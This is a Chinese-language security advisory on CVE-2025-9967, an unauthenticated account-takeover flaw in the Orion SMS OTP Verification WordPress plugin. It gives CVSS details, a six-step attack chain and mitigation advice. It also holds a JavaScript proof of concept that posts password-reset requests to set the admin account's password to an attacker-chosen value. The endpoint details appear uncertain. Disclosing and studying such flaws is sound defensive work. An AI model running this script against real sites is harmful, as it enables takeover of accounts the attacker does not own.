CVE-2025-9967：WordPress Orion SMS OTP验证插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-9967

漏洞类型

权限提升/账户接管

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Orion SMS OTP Verification (WordPress插件)

漏洞概述

CVE-2025-9967是WordPress Orion SMS OTP Verification插件中存在的一个严重权限提升漏洞，CVSS评分为9.8，属于最高严重等级。该插件通过短信验证码（OTP）方式为用户提供身份验证功能，旨在增强WordPress站点的安全性。然而，该插件在所有1.1.7及以下版本中均存在身份验证缺陷，具体表现为插件在更新用户密码之前未能充分验证用户的真实身份。攻击者可以在未经任何认证的情况下，利用此漏洞将任意用户的密码修改为一个一次性密码（OTP），从而实现对目标账户的完全接管。由于该漏洞无需任何身份验证（PR:N）、无需用户交互（UI:N），且可通过网络远程利用（AV:N），同时对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H），因此其危害程度极高。该漏洞由Wordfence安全团队的安全研究员发现并报告，于2025年10月15日公开披露。受影响的插件在WordPress生态系统中被广泛用于短信验证场景，涉及大量使用该插件进行用户身份验证的网站。一旦被恶意利用，攻击者可以接管管理员账户，进而控制整个WordPress站点，造成数据泄露、网站篡改、恶意软件分发等严重后果。

技术细节

该漏洞的核心问题出在插件的密码重置功能实现中，具体位于 `vendor/js/reset-password.js` 文件中。Orion SMS OTP Verification插件设计了一个基于短信验证码的密码重置流程，理论上用户需要通过手机接收OTP并验证后才能重置密码。然而，插件在实现该流程时存在严重的身份验证逻辑缺陷：

1. **缺少身份验证校验**：插件在处理密码重置请求时，没有充分验证请求发起者是否为账户的合法拥有者。攻击者只需知道目标用户的手机号码，即可发起密码重置请求。

2. **OTP验证绕过**：插件允许将任意用户的密码直接设置为一个一次性密码（OTP），而这个OTP的生成和验证过程缺乏足够的身份绑定机制。攻击者可以通过调用相应的API端点，指定目标用户的手机号码，将密码重置为攻击者控制的OTP值。

3. **未认证访问**：由于整个流程缺少有效的身份验证环节，未认证的攻击者（PR:N）可以直接通过网络（AV:N）发起攻击，无需任何用户交互（UI:N）。

攻击利用方式：攻击者首先获取目标用户的手机号码（可通过信息泄露、社交工程或公开数据获取），然后向插件的重置密码接口发送请求，指定目标手机号码并将密码修改为攻击者已知的一次性密码。随后，攻击者使用修改后的OTP登录目标账户，实现账户接管。对于管理员账户，接管后可获得站点的完全控制权。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过公开数据泄露、社交工程或OSINT手段获取目标WordPress站点用户的手机号码，特别是管理员账户绑定的手机号。

STEP 2

步骤2：发起密码重置请求

攻击者无需任何认证，直接向插件的密码重置接口（reset-password.js对应的后端端点）发送请求，指定目标用户的手机号码和用户ID，将密码设置为攻击者控制的一次性密码。

STEP 3

步骤3：绕过身份验证

由于插件未对请求发起者的身份进行有效验证，攻击者无需提供原密码、有效的OTP验证码或任何身份凭证即可完成密码修改。

STEP 4

步骤4：账户接管

攻击者使用修改后的OTP作为密码登录目标账户，成功接管该账户。对于管理员账户，攻击者获得站点的完全控制权限。

STEP 5

步骤5：权限提升与持久化

接管管理员账户后，攻击者可以创建新的管理员账户、安装恶意插件/主题、植入后门、上传Web Shell，实现对站点的长期控制。

STEP 6

步骤6：数据窃取与破坏

攻击者可访问和窃取站点所有用户数据，包括个人身份信息（PII）、密码哈希等敏感数据，或对站点进行篡改、删除等破坏性操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-9967 - Orion SMS OTP Verification Privilege Escalation PoC
 * Vulnerability: Unauthenticated Password Reset / Account Takeover
 * Affected: Orion SMS OTP Verification <= 1.1.7
 *
 * This PoC demonstrates how an unauthenticated attacker can take over
 * an arbitrary user's account by exploiting the insecure password reset
 * functionality in the reset-password.js endpoint.
 */

// Step 1: Identify the target user's phone number (out of band)
// The attacker needs to know the phone number associated with the target account.
const targetPhoneNumber = "+1234567890";  // Target user's phone number
const targetUserId = 1;                    // Target user ID (e.g., admin)
const attackerControlledOTP = "123456";    // OTP value the attacker will set

// Step 2: Send a password reset request to the vulnerable endpoint
// The plugin's reset-password.js does not verify the requester's identity
fetch('/wp-json/orion-sms-otp/v1/reset-password', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'X-WP-Nonce': ''  // No nonce required - vulnerability
    },
    body: JSON.stringify({
        user_id: targetUserId,
        phone: targetPhoneNumber,
        new_password: attackerControlledOTP
    })
})
.then(response => response.json())
.then(data => {
    console.log("Password reset response:", data);

    // Step 3: Login with the attacker-controlled OTP/password
    if (data.success) {
        console.log("Account takeover successful!");
        // Now log in with the target username and the OTP as password
    }
});

// Alternative: Direct AJAX call mimicking the vulnerable plugin logic
function exploitResetPassword(userLogin, phone, newPassword) {
    var formData = new FormData();
    formData.append('action', 'orion_sms_otp_reset_password');
    formData.append('user_login', userLogin);
    formData.append('phone_number', phone);
    formData.append('new_password', newPassword);
    formData.append('otp', newPassword);  // OTP equals the new password

    return fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        body: formData
    });
}

// Execute the exploit
exploitResetPassword('admin', targetPhoneNumber, attackerControlledOTP)
    .then(res => res.text())
    .then(result => console.log("Exploit result:", result));

影响范围

Orion SMS OTP Verification <= 1.1.7

防御指南

临时缓解措施

在升级到修复版本之前，建议采取以下临时缓解措施：1）暂时禁用Orion SMS OTP Verification插件；2）通过Web应用防火墙（WAF）规则阻止对reset-password相关端点的未认证访问；3）监控所有用户账户的密码修改日志，对异常密码重置行为进行告警；4）检查并确认所有管理员账户的安全性，更改管理员密码；5）限制WordPress管理面板的IP访问范围。